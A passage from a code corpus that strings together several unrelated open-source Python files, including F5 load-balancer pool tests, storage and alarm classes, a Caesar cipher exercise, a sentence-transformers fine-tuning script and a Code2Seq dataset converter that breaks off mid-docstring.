'description': None},
{'ratio': 1,
'name': '172.16.0.101:8080',
'partition': 'Common',
'session': 'monitor-enabled',
'priorityGroup': 0,
'connectionLimit': 0,
'description': None}
]
},
'name': u'pool1'
},
{'description': None,
'partition': 'Common',
'loadBalancingMode': 'round-robin',
'monitor': '/Common/http ',
'name': u'pool1'
}
]
cccl_pools_cfg = [
{ "name": "pool0" },
{ "name": "pool1",
"members": [
{"address": "172.16.0.100", "port": 8080, "routeDomain": {"id": 0}},
{"address": "172.16.0.101", "port": 8080, "routeDomain": {"id": 0}}
],
"monitors": ["/Common/http"]
},
{ "name": "pool2",
"members": [
{"address": "192.168.0.100", "port": 80, "routeDomain": {"id": 2}},
{"address": "192.168.0.101", "port": 80, "routeDomain": {"id": 2}}
],
"monitors": []
},
{ "name": "pool3",
"members": [],
"description": "This is test pool 3",
"monitors": []
},
{ "name": "pool4",
"members": [],
"description": "This is test pool 4",
"monitors": ["/Common/http"]
},
{ "name": "pool1",
"members": [
{"address": "172.16.0.100", "port": 8080, "routeDomain": {"id": 0}},
{"address": "172.16.0.102", "port": 8080, "routeDomain": {"id": 0}}
],
"monitors": ["/Common/http"]
}
]
@pytest.fixture
def bigip():
bigip = MagicMock()
return bigip
@pytest.fixture
def bigip_pool0():
return bigip_pools_cfg[0]
@pytest.fixture
def bigip_pool1():
return bigip_pools_cfg[1]
@pytest.fixture
def cccl_pool0():
return cccl_pools_cfg[0]
@pytest.fixture
def cccl_pool1():
return cccl_pools_cfg[1]
@pytest.fixture
def cccl_pool2():
return cccl_pools_cfg[2]
@pytest.fixture
def cccl_pool3():
return cccl_pools_cfg[3]
@pytest.fixture
def cccl_pool5():
return cccl_pools_cfg[5]
@pytest.fixture
def bigip_members():
members_filename = (
os.path.join(os.path.dirname(os.path.abspath(__file__)),
'./bigip-members.json'))
with open(members_filename) as fp:
json_data = fp.read()
json_data = json.loads(json_data)
members = [m for m in json_data['members']]
pp(json_data)
return members
def test_create_pool_minconfig(cccl_pool0):
pool = ApiPool(partition="Common", **cccl_pool0)
assert pool.name == "pool0"
assert pool.partition == "Common"
assert pool.data['loadBalancingMode'] == "round-robin"
assert not pool.data['description']
assert len(pool) == 0
assert pool.data['monitor'] == "default"
def test_create_pool(cccl_pool1):
pool = ApiPool(partition="Common", **cccl_pool1)
assert pool.name == "pool1"
assert pool.partition == "Common"
assert pool.data['loadBalancingMode'] == "round-robin"
assert not pool.data['description']
assert pool.data['monitor'] == "/Common/http"
assert len(pool) == 2
def test_create_pool_empty_lists(cccl_pool3):
pool = ApiPool(partition="Common", **cccl_pool3)
assert pool.name == "pool3"
assert pool.partition == "Common"
assert pool.data['loadBalancingMode'] == "round-robin"
assert pool.data['description'] == "This is test pool 3"
assert pool.data['monitor'] == "default"
assert len(pool) == 0
def test_compare_equal_pools(cccl_pool0):
p1 = ApiPool(partition="Common", **cccl_pool0)
p2 = ApiPool(partition="Common", **cccl_pool0)
assert id(p1) != id(p2)
assert p1 == p2
def test_compare_pool_and_dict(cccl_pool0):
pool = ApiPool(partition="Common", **cccl_pool0)
assert not pool == cccl_pool0
def test_get_uri_path(bigip, cccl_pool0):
pool = ApiPool(partition="Common", **cccl_pool0)
assert pool._uri_path(bigip) == bigip.tm.ltm.pools.pool
def test_pool_hash(bigip, cccl_pool0):
pool = ApiPool(partition="Common", **cccl_pool0)
assert hash(pool) == hash((pool.name, pool.partition))
def test_compare_bigip_cccl_pools(cccl_pool1, bigip_pool0):
bigip_pool = IcrPool(**bigip_pool0)
cccl_pool = ApiPool(partition="Common", **cccl_pool1)
assert bigip_pool == cccl_pool
def test_create_bigip_pool_no_members(bigip_pool1):
bigip_pool = IcrPool(**bigip_pool1)
assert bigip_pool.data['membersReference']
assert bigip_pool.data['membersReference']['items'] == []
def test_compare_pools_unequal_members(bigip, cccl_pool1, cccl_pool2, cccl_pool5):
pool1 = ApiPool(partition="Common", **cccl_pool1)
pool2 = ApiPool(partition="Common", **cccl_pool2)
pool5 = ApiPool(partition="Common", **cccl_pool5)
pool1_one_member_cfg = { "name": "pool1",
"members": [
{"address": "172.16.0.100", "port": 8080, "routeDomain": {"id": 0}},
],
"monitors": ["/Common/http"]
}
pool1_one_member = ApiPool(partition="Common",
**pool1_one_member_cfg)
pool2_with_monitor = { "name": "pool2",
"members": [
{"address": "192.168.0.100", "port": 80, "routeDomain": {"id": 2}},
{"address": "192.168.0.101", "port": 80, "routeDomain": {"id": 2}}
],
"monitors": ["/Common/http"]
}
pool2_with_monitor = ApiPool(partition="Common",
**pool2_with_monitor)
assert not pool1 == pool2
assert pool1 != pool2
assert not pool1_one_member == pool1
assert not pool2_with_monitor == pool2
assert not pool1 == pool5
assert pool1 != pool5
assert pool5 != pool1
def test_get_monitors(bigip):
pool = ApiPool(name="pool1", partition="Common")
assert pool._get_monitors(None) == "default"
assert pool._get_monitors([]) == "default"
monitors = ["/Common/http", "/Common/my_tcp"]
assert pool._get_monitors(monitors) == "/Common/http and /Common/my_tcp"
monitors = ["", ""]
assert pool._get_monitors(monitors) == " and "
monitors = ["/Common/my_tcp", "/Common/http"]
assert pool._get_monitors(monitors) == "/Common/http and /Common/my_tcp"
| richbrowne/f5-cccl | f5_cccl/resource/ltm/test/test_pool.py | Python | apache-2.0 | 7,378 |
"""
rohmu
Copyright (c) 2016 Ohmu Ltd
See LICENSE for details
"""
from . errors import InvalidConfigurationError
IO_BLOCK_SIZE = 2 ** 20 # 1 MiB
def get_class_for_transfer(storage_type):
if storage_type == "azure":
from .object_storage.azure import AzureTransfer
return AzureTransfer
elif storage_type == "google":
from .object_storage.google import GoogleTransfer
return GoogleTransfer
elif storage_type == "local":
from .object_storage.local import LocalTransfer
return LocalTransfer
elif storage_type == "s3":
from .object_storage.s3 import S3Transfer
return S3Transfer
elif storage_type == "swift":
from .object_storage.swift import SwiftTransfer
return SwiftTransfer
raise InvalidConfigurationError("unsupported storage type {0!r}".format(storage_type))
def get_transfer(storage_config, *, storage_type=None):
# TODO: drop storage_type from the function signature, always read it from the config
if "storage_type" in storage_config:
storage_config = storage_config.copy()
storage_type = storage_config.pop("storage_type")
storage_class = get_class_for_transfer(storage_type)
return storage_class(**storage_config)
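# Illustrative usage sketch (the configuration keys and the method called on
# the returned transfer object are assumptions; each backend defines its own
# settings):
#
#     transfer = get_transfer({"storage_type": "local", "directory": "/tmp/backups"})
#     transfer.store_file_from_memory("example/key", b"data")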
| saaros/pghoard | pghoard/rohmu/__init__.py | Python | apache-2.0 | 1,265 |
# Copyright 2017 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
# This setup file is used when running cloud training or cloud dataflow jobs.
from setuptools import setup, find_packages
setup(
name='trainer',
version='1.0.0',
packages=find_packages(),
description='Google Cloud Datalab helper sub-package',
author='Google',
author_email='[email protected]',
keywords=[
],
license="Apache Software License",
long_description="""
""",
install_requires=[
'tensorflow==1.15.2',
'protobuf==3.1.0',
'pillow==6.2.0', # ML Engine does not have PIL installed
],
package_data={
},
data_files=[],
)
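# Illustrative usage sketch (job name and paths are assumptions): this package
# definition is what gets bundled when the trainer is submitted to a managed
# service, e.g. build a source distribution with
#
#     python setup.py sdist --dist-dir=dist
#
# or point a training job submission at the package directory, e.g.
#
#     gcloud ml-engine jobs submit training my_job --package-path trainer ...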
| googledatalab/pydatalab | solutionbox/ml_workbench/tensorflow/setup.py | Python | apache-2.0 | 1,189 |
# toontown.tutorial.TutorialTVScenes
from panda3d.core import Camera
from direct.task.Task import Task
from otp.avatar import Emote
from toontown.television.TVScenes import *
from toontown.television.TVEffects import *
from toontown.suit.Suit import Suit
from toontown.suit.BossCog import BossCog
from toontown.suit.SuitDNA import SuitDNA
from toontown.toon import NPCToons, TTEmote
import random
class CEOScene(ThreeDScene):
CameraPos = [(0, 203.5, 23.5, 0, 350, 0)]
def __init__(self, effects = []):
ThreeDScene.__init__(self, 'CEOScene', effects)
self.geom = loader.loadModel('phase_12/models/bossbotHQ/BanquetInterior_1')
self.geom.reparentTo(self)
self.ceo = BossCog()
dna = SuitDNA()
dna.newBossCog('c')
self.ceo.setDNA(dna)
self.ceo.reparentTo(self)
self.ceo.setPosHpr(0, 236.5, 0, 180, 0, 0)
self.ceo.loop('Bb_neutral')
def delete(self):
if self.geom:
self.geom.removeNode()
self.geom = None
if self.ceo:
self.ceo.delete()
self.ceo = None
ThreeDScene.delete(self)
return
class HeadHunterScene(ThreeDScene):
CameraPos = [(-22, -12.5, 7, 92, -6, 0)]
def __init__(self, effects = []):
ThreeDScene.__init__(self, 'HeadHunterScene', effects)
self.geom = loader.loadModel('phase_12/models/bossbotHQ/BossbotEntranceRoom')
self.geom.reparentTo(self)
self.cog = Suit()
dna = SuitDNA()
dna.newSuit('hh')
self.cog.setDNA(dna)
self.cog.reparentTo(self)
self.cog.setPosHpr(-32.5, -12.5, 0.02, 270, 0, 0)
self.cog.nametag3d.removeNode()
self.cog.nametag.destroy()
self.cog.loop('neutral')
def delete(self):
if self.geom:
self.geom.removeNode()
self.geom = None
if self.cog:
self.cog.delete()
self.cog = None
ThreeDScene.delete(self)
return
class ScientistScene(ThreeDScene):
CameraPos = [(-47.5, 0.5, 3.415, 90, 0, 0)]
ToonPos = {2018: (-59, -1.5, 0.02, 270, 0, 0),
2019: (-59, 0.5, 0.02, 270, 0, 0),
2020: (-59, 2.5, 0.02, 270, 0, 0)}
RandomEmotes = ['wave',
'angry',
'applause',
'cringe',
'confused',
'slip-forward',
'slip-backward',
'resistance-salute',
'surprise',
'cry',
'furious',
'laugh',
'idea',
'taunt',
'rage']
def __init__(self, effects = []):
ThreeDScene.__init__(self, 'ScientistScene', effects)
self.geom = loader.loadModel('phase_3.5/models/modules/tt_m_ara_int_toonhall')
self.geom.reparentTo(self)
self.taskStarted = False
self.npcs = []
for id, posHpr in self.ToonPos.iteritems():
npc = NPCToons.createLocalNPC(id)
npc.reparentTo(self.geom)
npc.setPosHpr(*posHpr)
npc.nametag3d.removeNode()
npc.nametag.destroy()
self.npcs.append(npc)
def delete(self):
if self.geom:
self.geom.removeNode()
self.geom = None
for npc in self.npcs:
taskMgr.remove(npc.uniqueName('randomEmote'))
npc.delete()
self.npcs = []
self.taskStarted = False
ThreeDScene.delete(self)
return
def startTask(self):
if self.taskStarted:
return
for i, npc in enumerate(self.npcs):
taskMgr.doMethodLater(0.25 * i, lambda task, npc = npc: self.doRandomEmote(npc, task), npc.uniqueName('randomEmote'))
self.taskStarted = True
def stopTask(self):
if not self.taskStarted:
return
for npc in self.npcs:
taskMgr.remove(npc.uniqueName('randomEmote'))
self.taskStarted = False
def doRandomEmote(self, npc, task):
Emote.globalEmote.doEmote(npc, TTEmote.Emotes.index(random.choice(self.RandomEmotes)), 0)
task.delayTime = npc.emoteTrack.getDuration() + 1.0
        return task.again
 | DedMemez/ODS-August-2017 | tutorial/TutorialTVScenes.py | Python | apache-2.0 | 4,254 |
import cs50
import sys
def main():
if len(sys.argv) != 2:
print("You should provide cmd line arguments!")
exit(1)
    if not sys.argv[1].isdigit():
        print("You should provide a valid numeric key!")
        exit(1)
    key = int(sys.argv[1])
cipher = []
plainText = cs50.get_string()
for symbol in plainText:
if symbol.isalpha():
            cipher.append(caesar(symbol, key))
else:
cipher.append(symbol)
print("".join(cipher))
exit(0)
def caesar(char, key):
    if char.isupper():
        return chr(((ord(char) - 65 + key) % 26) + 65)
    else:
        return chr(((ord(char) - 97 + key) % 26) + 97)
if __name__ == "__main__":
main()
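# Worked example (illustrative): with key 3, caesar('A', 3) computes
# (65 - 65 + 3) % 26 + 65 = 68 -> 'D', and caesar('z', 3) wraps around to 'c'.
# Run as: python caesar.py 3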
# #include <ctype.h>
# #include <string.h>
# #include <cs50.h>
# #include <stdio.h>
# #include <stdlib.h>
# //define my caesarCipher
# void caesarCipher(char* plainText,int key);
# def int main(int argc, char* argv[]): # //{//????????????????/char*
# if argc is not 2:
# # {
# print("Usage: ./caesar k\n")
# #return 1
# #}
# #//printf(" %s\n", argv[1]);
# int key = atoi(sys.argv[1])
# char plainText[101]
# print("plaintext: ")#;//ask user
# fgets(plainText, sizeof(plainText), stdin);//get user input & store it in planText var++++++++
# print("ciphertext: ")#;//print the ciphered text
# caesarCipher(plainText,key)
# //system(pause);//connect out if not use wind---------------------------???????????????
# # return 0;
# #}
# void caesarCipher(char* plainText, int key){//key pomen mestami on first plaiiiiiiiiiin
# int i = 0
# char cipher
# int cipherValue
# while plainText[i] != '\0' and strlen(plainText) -1 > i :break#// for(int i=1,len=strlen(name);i<len;i++)
# if isalpha(plainText[i]) and islower(plainText[i]):
# cipherValue = ((int)((plainText[i]) - 97 + key) % 26 + 97)
# cipher = (char)(cipherValue);printf("%c", cipher)
# i++
# else:
# if isalpha(plainText[i]) and isupper(plainText[i]):# // if isaph char
# cipherValue = ((int)(plainText[i] - 65 + key) % 26 + 65)
# cipher = (char)(cipherValue)
# print("%c", cipher)
# i++
# else: #//if not isaplha low or up
# print("%c", plainText[i])
# i++
# print("\n")
#}
 | DInnaD/CS50 | pset6/caesar.py | Python | apache-2.0 | 2,532 |
# Copyright 2017-present Adtran, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from voltha.protos.events_pb2 import AlarmEventType, AlarmEventSeverity, AlarmEventCategory
from voltha.extensions.alarms.adapter_alarms import AlarmBase
class OltLosAlarm(AlarmBase):
def __init__(self, alarm_mgr, intf_id, port_type_name):
super(OltLosAlarm, self).__init__(alarm_mgr, object_type='olt LOS',
alarm='OLT_LOS',
alarm_category=AlarmEventCategory.OLT,
alarm_type=AlarmEventType.COMMUNICATION,
alarm_severity=AlarmEventSeverity.MAJOR)
# Added port type to indicate if alarm was on NNI or PON
self._intf_id = intf_id
self._port_type_name = port_type_name
def get_context_data(self):
return {'olt-intf-id:': self._intf_id,
'olt-port-type-name': self._port_type_name}
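# Illustrative usage sketch (the alarm manager object, interface id and port
# type name are assumptions made for the example):
#
#     alos = OltLosAlarm(alarm_mgr, intf_id=0, port_type_name='nni')
#     context = alos.get_context_data()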
| opencord/voltha | voltha/extensions/alarms/olt/olt_los_alarm.py | Python | apache-2.0 | 1,492 |
# -*- coding: utf-8 -*-
# Copyright 2017 DST Controls
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
osisoftpy.factory
~~~~~~~~~~~~
"""
from __future__ import (absolute_import, division, unicode_literals)
from future.builtins import *
from future.utils import iteritems
def create(factory, thing, session, webapi=None):
"""
    Return an object created with the factory.
    :param factory: Factory whose type will be instantiated.
    :param thing: Dict of attributes for the object; keys are lower-cased.
    :param session: Requests session passed through to the created object.
    :param webapi: Optional Web API reference passed through to the object.
    :return: The created object.
"""
payload = dict(map(lambda k_v: (k_v[0].lower(), k_v[1]), iteritems(thing)))
    # This block used to skip creating Value objects when the value was flagged
    # as bad, but it was removed because the library should not cull bad values
    # returned by the PI Web API.
#
# if 'good' in payload:
# if not payload['good']:
# return None
payload.update({'session': session, 'webapi': webapi})
thing = factory.create(**payload)
return thing
class Factory(object):
def __init__(self, type_):
self.type = type_
def create(self, **kwargs):
return self.type(**kwargs)
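# Illustrative usage sketch (the attribute dict and session value are
# assumptions): `create` lower-cases the keys and injects 'session'/'webapi'
# before instantiating the factory's type.
#
#     factory = Factory(dict)
#     obj = create(factory, {'Name': 'sinusoid', 'Good': True}, session=None)
#     # obj == {'name': 'sinusoid', 'good': True, 'session': None, 'webapi': None}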
| dstcontrols/osisoftpy | src/osisoftpy/factory.py | Python | apache-2.0 | 1,646 |
"""
This example loads the pre-trained SentenceTransformer model 'nli-distilroberta-base-v2' from the server.
It then fine-tunes this model for some epochs on the STS benchmark dataset.
Note: In this example, you must specify a SentenceTransformer model.
If you want to fine-tune a huggingface/transformers model like bert-base-uncased, see training_nli.py and training_stsbenchmark.py
"""
from torch.utils.data import DataLoader
import math
from sentence_transformers import SentenceTransformer, LoggingHandler, losses, util, InputExample
from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator
import logging
from datetime import datetime
import os
import gzip
import csv
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
datefmt='%Y-%m-%d %H:%M:%S',
level=logging.INFO,
handlers=[LoggingHandler()])
#### /print debug information to stdout
# Check if the dataset exists. If not, download and extract it
sts_dataset_path = 'datasets/stsbenchmark.tsv.gz'
if not os.path.exists(sts_dataset_path):
util.http_get('https://sbert.net/datasets/stsbenchmark.tsv.gz', sts_dataset_path)
# Read the dataset
model_name = 'nli-distilroberta-base-v2'
train_batch_size = 16
num_epochs = 4
model_save_path = 'output/training_stsbenchmark_continue_training-'+model_name+'-'+datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
# Load a pre-trained sentence transformer model
model = SentenceTransformer(model_name)
# Convert the dataset to a DataLoader ready for training
logging.info("Read STSbenchmark train dataset")
train_samples = []
dev_samples = []
test_samples = []
with gzip.open(sts_dataset_path, 'rt', encoding='utf8') as fIn:
reader = csv.DictReader(fIn, delimiter='\t', quoting=csv.QUOTE_NONE)
for row in reader:
score = float(row['score']) / 5.0 # Normalize score to range 0 ... 1
inp_example = InputExample(texts=[row['sentence1'], row['sentence2']], label=score)
if row['split'] == 'dev':
dev_samples.append(inp_example)
elif row['split'] == 'test':
test_samples.append(inp_example)
else:
train_samples.append(inp_example)
train_dataloader = DataLoader(train_samples, shuffle=True, batch_size=train_batch_size)
train_loss = losses.CosineSimilarityLoss(model=model)
# Development set: Measure correlation between cosine score and gold labels
logging.info("Read STSbenchmark dev dataset")
evaluator = EmbeddingSimilarityEvaluator.from_input_examples(dev_samples, name='sts-dev')
# Configure the training. The model is evaluated on the dev set every 1000 steps during training.
warmup_steps = math.ceil(len(train_dataloader) * num_epochs * 0.1) #10% of train data for warm-up
logging.info("Warmup-steps: {}".format(warmup_steps))
# Train the model
model.fit(train_objectives=[(train_dataloader, train_loss)],
evaluator=evaluator,
epochs=num_epochs,
evaluation_steps=1000,
warmup_steps=warmup_steps,
output_path=model_save_path)
##############################################################################
#
# Load the stored model and evaluate its performance on STS benchmark dataset
#
##############################################################################
model = SentenceTransformer(model_save_path)
test_evaluator = EmbeddingSimilarityEvaluator.from_input_examples(test_samples, name='sts-test')
test_evaluator(model, output_path=model_save_path)
 | UKPLab/sentence-transformers | examples/training/sts/training_stsbenchmark_continue_training.py | Python | apache-2.0 | 3,514 |
# Copyright 2011 Tsutomu Uchino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unohelper
from com.sun.star.frame import XController, XTitle, XDispatchProvider
from com.sun.star.lang import XServiceInfo
from com.sun.star.task import XStatusIndicatorSupplier
class MRIUIController(unohelper.Base,
XController, XTitle, XDispatchProvider,
XStatusIndicatorSupplier, XServiceInfo):
""" Provides controller which connects between frame and model. """
IMPLE_NAME = "mytools.mri.UIController"
    def __init__(self, frame, model):
self.frame = frame
self.model = model
self.ui = None
def set_ui(self, ui):
self.ui = ui
def get_imple_name(self):
return self.ui.pages.get_imple_name()
# XTitle
def getTitle(self):
return self.frame.getTitle()
def setTitle(self, title):
self.frame.setTitle(title)
def dispose(self):
self.frame = None
self.model = None
def addEventListener(self, xListener):
pass
def removeEventListener(self, aListener):
pass
# XController
def attachFrame(self, frame):
self.frame = frame
def attachModel(self, model):
self.model = model
def suspend(self, Suspend):
return True
def getViewData(self):
""" Returns current instance inspected. """
return self.ui.main.current.target
def restoreViewData(self, Data):
pass
def getModel(self):
return self.model
def getFrame(self):
return self.frame
def getStatusIndicator(self):
pass
# XDispatchProvider
def queryDispatch(self, url, name, flags):
pass
def queryDispatches(self, requests):
pass
# XServiceInfo
def getImplementationName(self):
return self.IMPLE_NAME
def supportsService(self, name):
return name == self.IMPLE_NAME
def getSupportedServiceNames(self):
return self.IMPLE_NAME,
| hanya/MRI | pythonpath/mytools_Mri/ui/controller.py | Python | apache-2.0 | 2,539 |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Classes for converting the Code2Seq dataset to a PLUR dataset.
"""
import os
import tarfile
import apache_beam as beam
from plur.stage_1.plur_dataset import Configuration
from plur.stage_1.plur_dataset import PlurDataset
from plur.utils import constants
from plur.utils import util
from plur.utils.graph_to_output_example import GraphToOutputExample
from plur.utils.graph_to_output_example import GraphToOutputExampleNotValidError
import tqdm
class Code2SeqDataset(PlurDataset):
# pylint: disable=line-too-long
"""Converting data from code2seq dataset to a PLUR dataset.
The dataset is used in: Alon, Uri, et al. 'code2seq: Generating sequences from
structured representations of code.' arXiv preprint arXiv:1808.01400 (2018).
The task is to predict the function name given the function body.
  The dataset provided by code2seq contains the tokenized function name and the
  sampled AST paths, so we have to create our own graph representation for
  code2seq. We try to mimic the code2seq model by constructing a graph similar
  to figure 3 in the code2seq paper. An example of such a graph is shown in
  https://drive.google.com/file/d/1-cH0FzYIMikgTkUpzVkEZDGjoiqBB9C1/view?usp=sharing.
  In short, we build the AST path subtrees and connect all AST paths with a
  code2seq root node to make it a graph.
"""
_URLS_SMALL = {
'java-small-preprocessed.tar.gz': {
'url': 'https://s3.amazonaws.com/code2seq/datasets/java-small-preprocessed.tar.gz',
'sha1sum': '857c2495785f606ab99676c7bbae601ea2160f66',
}
}
_URLS_MED = {
'java-med-preprocessed.tar.gz': {
'url': 'https://s3.amazonaws.com/code2seq/datasets/java-med-preprocessed.tar.gz',
'sha1sum': '219e558ddf46678ef322ff75bf1982faa1b6204d',
}
}
_URLS_LARGE = {
'java-large-preprocessed.tar.gz': {
'url': 'https://s3.amazonaws.com/code2seq/datasets/java-large-preprocessed.tar.gz',
'sha1sum': 'ebc229ba1838a3c8f3a69ab507eb26fa5460152a',
}
}
# pylint: enable=line-too-long
_GIT_URL = {}
_DATASET_NAME = 'code2seq_dataset'
_DATASET_DESCRIPTION = """\
This dataset is used to train the code2seq model. The task is to predict the
  function name, given the AST paths sampled from the function AST. An AST path is
a path between two leaf nodes in the AST.
"""
def __init__(self,
stage_1_dir,
configuration: Configuration = Configuration(),
transformation_funcs=(),
filter_funcs=(),
user_defined_split_range=(),
num_shards=1000,
seed=0,
dataset_size='small',
deduplicate=False):
# dataset_size can only be 'small', 'med' or 'large'.
valid_dataset_size = {'small', 'med', 'large'}
if dataset_size not in valid_dataset_size:
raise ValueError('{} not in {}'.format(dataset_size,
str(valid_dataset_size)))
if dataset_size == 'small':
urls = self._URLS_SMALL
elif dataset_size == 'med':
urls = self._URLS_MED
else:
urls = self._URLS_LARGE
self.dataset_size = dataset_size
super().__init__(self._DATASET_NAME, urls, self._GIT_URL,
self._DATASET_DESCRIPTION, stage_1_dir,
transformation_funcs=transformation_funcs,
filter_funcs=filter_funcs,
user_defined_split_range=user_defined_split_range,
num_shards=num_shards, seed=seed,
configuration=configuration, deduplicate=deduplicate)
def download_dataset(self):
"""Download the dataset using requests and extract the tarfile."""
super().download_dataset_using_requests()
# Extract the tarfile depending on the dataset size.
if self.dataset_size == 'small':
self.code2seq_extracted_dir = os.path.join(
self.raw_data_dir, 'java-small')
tarfile_name = 'java-small-preprocessed.tar.gz'
elif self.dataset_size == 'med':
self.code2seq_extracted_dir = os.path.join(
self.raw_data_dir, 'java-med')
tarfile_name = 'java-med-preprocessed.tar.gz'
else:
self.code2seq_extracted_dir = os.path.join(
self.raw_data_dir, 'java-large')
tarfile_name = 'java-large-preprocessed.tar.gz'
tarfiles_to_extract = []
tarfiles_to_extract = util.check_need_to_extract(
tarfiles_to_extract, self.code2seq_extracted_dir,
tarfile_name)
for filename in tarfiles_to_extract:
dest = os.path.join(self.raw_data_dir, filename)
with tarfile.open(dest, 'r:gz') as tf:
for member in tqdm.tqdm(
tf.getmembers(),
unit='file',
desc='Extracting {}'.format(filename)):
tf.extract(member, self.raw_data_dir)
def get_all_raw_data_paths(self):
"""Get paths to all raw data."""
# Get the filenames depending on the dataset size.
if self.dataset_size == 'small':
train_file = os.path.join(
self.code2seq_extracted_dir, 'java-small.train.c2s')
validation_file = os.path.join(
self.code2seq_extracted_dir, 'java-small.val.c2s')
test_file = os.path.join(
self.code2seq_extracted_dir, 'java-small.test.c2s')
elif self.dataset_size == 'med':
train_file = os.path.join(
self.code2seq_extracted_dir, 'java-med.train.c2s')
validation_file = os.path.join(
self.code2seq_extracted_dir, 'java-med.val.c2s')
test_file = os.path.join(
self.code2seq_extracted_dir, 'java-med.test.c2s')
else:
train_file = os.path.join(
self.code2seq_extracted_dir, 'java-large.train.c2s')
validation_file = os.path.join(
self.code2seq_extracted_dir, 'java-large.val.c2s')
test_file = os.path.join(
self.code2seq_extracted_dir, 'java-large.test.c2s')
return [train_file, validation_file, test_file]
def raw_data_paths_to_raw_data_do_fn(self):
"""Returns a beam.DoFn subclass that reads the raw data."""
return C2SExtractor(super().get_random_split,
bool(self.user_defined_split_range))
def _construct_token_subtree(self, graph_to_output_example, token,
cur_node_id, token_root_name):
# pylint: disable=line-too-long
"""Construct the token subtree in a AST path.
We create a node for each subtoken in the token, all subtokens are connected
to the next subtoken via the 'NEXT_SUBTOKEN' edge. All subtokens are
connected to the token root node via the 'SUBTOKEN' edge. See the draw.io
figure mentioned in the class doc for the visualization.
Args:
graph_to_output_example: A GraphToOutputExample instance.
token: Starting or ending token in the AST path.
cur_node_id: Next available node id.
token_root_name: Node type and label for the token root node.
Returns:
A tuple of graph_to_output_example, cur_node_id, token_node_id.
graph_to_output_example is updated with the token subtree, cur_node_id is
the next available node id after all the token subtree nodes are added,
and token_node_id is the node id of the root token node.
"""
subtokens = token.split('|')
subtoken_node_ids = []
prev_subtoken_id = -1
    # Create a node for each subtoken.
for subtoken in subtokens:
graph_to_output_example.add_node(cur_node_id, 'SUBTOKEN', subtoken)
subtoken_node_ids.append(cur_node_id)
# Connects to the previous subtoken node
if prev_subtoken_id != -1:
graph_to_output_example.add_edge(prev_subtoken_id, cur_node_id,
'NEXT_SUBTOKEN')
prev_subtoken_id = cur_node_id
cur_node_id += 1
# Add a root node for the token subtree.
graph_to_output_example.add_node(cur_node_id, token_root_name,
token_root_name)
token_node_id = cur_node_id
cur_node_id += 1
# Connect all subtoken nodes to the token subtree root node.
for node_id in subtoken_node_ids:
graph_to_output_example.add_edge(token_node_id, node_id, 'SUBTOKEN')
return graph_to_output_example, cur_node_id, token_node_id
def _construct_ast_nodes_subtree(self, graph_to_output_example, ast_nodes,
cur_node_id):
"""Construct the AST nodes subtree in a AST path.
We create a node for each AST node in the AST path. Each AST node are
connected to the next AST node via the 'NEXT_AST_NODE' edge. See the draw.io
figure mentioned in the class doc for the visualization.
Args:
graph_to_output_example: A GraphToOutputExample instance.
ast_nodes: AST nodes in the AST path.
cur_node_id: Current available node id.
Returns:
A tuple of graph_to_output_example, cur_node_id, ast_node_ids.
graph_to_output_example is updated with the ast nodes subtree,
cur_node_id is the next available node id after all the ast nodes are
added, and ast_node_ids the node ids of all AST nodes.
"""
ast_nodes = ast_nodes.split('|')
ast_node_ids = []
prev_ast_node_id = -1
    # Create a node for each AST node.
for ast_node in ast_nodes:
graph_to_output_example.add_node(cur_node_id, 'AST_NODE', ast_node)
ast_node_ids.append(cur_node_id)
# Connects to the previous AST node.
if prev_ast_node_id != -1:
graph_to_output_example.add_edge(prev_ast_node_id, cur_node_id,
'NEXT_AST_NODE')
prev_ast_node_id = cur_node_id
cur_node_id += 1
return graph_to_output_example, cur_node_id, ast_node_ids
def raw_data_to_graph_to_output_example(self, raw_data):
# pylint: disable=line-too-long
"""Convert raw data to the unified GraphToOutputExample data structure.
The Code2Seq raw data contains the target function name, and the sampled
AST paths. Each AST path starts and ends with a token, and a series of
AST nodes that connects the two tokens. We use _construct_token_subtree
to build the token subtree and _construct_ast_nodes_subtree to build the
AST nodes subtree. Then, all AST paths' nodes are connected to a AST root
node.
All AST root nodes are connected to a single code2seq root node.
https://drive.google.com/file/d/1-cH0FzYIMikgTkUpzVkEZDGjoiqBB9C1/view?usp=sharing
shows an example of such a graph and the original AST path.
Args:
raw_data: A dictionary with 'split', 'target_label' and 'ast_paths' as keys.
The value of the 'split' field is the split (train/valid/test) that the
data belongs to. The value of the 'target_label' field is the function
name. The value of the 'ast_paths' field is a list of AST paths.
Raises:
